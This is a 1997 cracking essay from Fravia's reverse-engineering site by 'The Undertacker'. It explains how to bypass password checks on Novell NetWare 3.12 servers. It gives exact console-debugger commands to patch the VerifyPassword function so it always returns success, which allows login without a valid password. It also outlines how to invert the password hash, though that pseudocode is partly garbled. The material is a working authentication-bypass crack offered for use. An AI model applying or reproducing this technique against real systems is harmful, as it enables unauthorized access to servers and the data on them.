Novell Netware 3.12
Netware reverse engineering - basic

by The Undertacker
(03 September 1997, slightly edited by Fravia)

Courtesy of Fravia's page of reverse engineering
Well, this is a welcome new direction for our studies... anybody else in order to start a new +HCU project: Netware cracking? Here is an excerpt from The Undertacker's accompanying letter:
I will start publishing Netware 3.12 cracks  first, because this is the version 
most widely used by organizations. Then, later, we'll move on to NW4.10 & NW4.11.


Novell Netware 3.12 -- [Session - 1]
Exploring The Password Procetion Scheme
By
The Undertacker -=BANDA=-


Before we start exploring Novell Netware here is a small introduction to  the
Netware Operating System.

Basically Netware supports Print & File sharing facilities. It also uses  the
NCP{IPX} to communicate with the clients. Netware comes with different 
number of client services(25user,50user...Versions). 
If you really want to learn more about this,  check their web site at 
www.novell.com 
Finally Netware has lots of  weak points (Security, Connection control, ....). 
So our aim is to examine those weak points and reverse their code. 
In this session we discuss how Netware security is organized & how to
defeat the Netware security protection schemes. 
The following Algorithm will give you a idea of  how Netware passwords are 
being encripted. 
Thanks go to {LiLiPuT} for the following information.

encryptd(int id[4], char password[])
	char    buffer[32];

	concatenate password[] to itself until its at least 32 bytes long
	put the result in buffer[]
	concatenate id[] to itself until its at least 32 bytes long
	xor the result into buffer[]

	return encrypd(buffer[])

encrypb(char buf[32])
	nibble  output[32];     // 4 bits msb or lsb

	complicated (but easily crackable!) function to buf[]

	for (i=0; i<32; i++) output[i]="S-box[buf[i]];" return output[] /* 16 byte return value */ 
where the S-box[] crunches 8 bit values down to 4 bit values.

So here's how to invert the password hash function, given the 16 byte
hash output[] value:

	for (i=0; i<32; i++) pick any x such that S-box[x]="=" output[i] // crack simple buf[i]="x" apply the reverse of the complicated function to buf[] concatenate id[] to itself..., and xor the result into buf[] use the resulting 32 byte buf[] as the inverse password 

I hope you all understand the above algorithm. If not FORGET about it 
and start working directly in the cracking session. 
To crack the password protection you need to use the server (console screen). 
Netware O/Sr comes with the internal Debugger for Developers. 
We can use this debugger for most of  our cracks. 
Here is the way to get into the debugger.

In the Console Screen,

     Press :- Lt.Shift+Rt.Shift+Alt+Esc - to Enter the debugger.

Now you are at the '#' prompt. 
To get more information about the Debugger type (H,HB,HE,.H).

-= CraCk SeSsion =-

Debugger supports CASE SENSITIVE Api names. 
I will include in the next session the complete Netware Api names. 
Ok Let's ROCK !!!!!

In the Debugger Type,..

#u VerifyPassword       ----> This function checks the user input  
                              password and the encrypted bindery 
                              entry. If it matches it returns
			        EAX=0 else EAX=bla bla bla....

Press the "Enter" key to scroll unassembled listing. Scroll until you see 
the "RET" instruction.

00328F76  C3    RET     ----> Address may change according to your server
			      Configuration.

Now Put a execution Break Point on above address.

B = 00328F76

Leave the Debugger by Pressing "g". Now log into the server from a work 
station using a wrong password. 
BUFFF!!! you land in sidethe debugger. 
Check the EAX value. 
OH! it is not equal to 0. 
That means it is a wrong password. 
If  you would press "g" again you would see a 'Password Incorrect' message 
inside your work  station. 
But if we change the value of the EAX register to 0 "EAX=0" & press "g" 
you can nevertheless log into the server. 
Ok Lets start the Crack.!!!!!

c VerifyPassword = B8 0 0 0 0 C3   --->  This command changes the operand 
                                         and the opcode

u VerifyPassword

Now you can see our changes....

XXXXXXXX B800000000    MOV     EAX,0
XXXXXXXX C3            RET

Clear all break points "bca" & press "g". 
Thats it you have done it. Novell Netware 3.1 reversed!
It doesn't ask for the password here after. 
I have kept this essay very simple because most of our readers are not 
familiar with Netware, nor with the Netware debugger. 
Once you'll have understood the basic, and we'll go along smoothly, 
I will include more complicated stuff in my sessions. 
More Sessions to come shortly. 
 
My thanks to all the friends in the +HCU. 

Happy NetworKing... Se Ya SOOn!!!!.

	   (((((((   ReversE EngineerinG LiveS ForeveR    )))))))


(C) 1997 The Undertacker -=BANDA=- All Rights Reserved.  // SRI LANKA //
(c) The Undertacker, 1997. All rights reversed.
You are deep inside fravia's page of reverse engineering, choose your way out:

homepage links red anonymity +ORC students' essays tools cocktails
academy database antismut search_forms mail_fravia
is reverse engineering legal?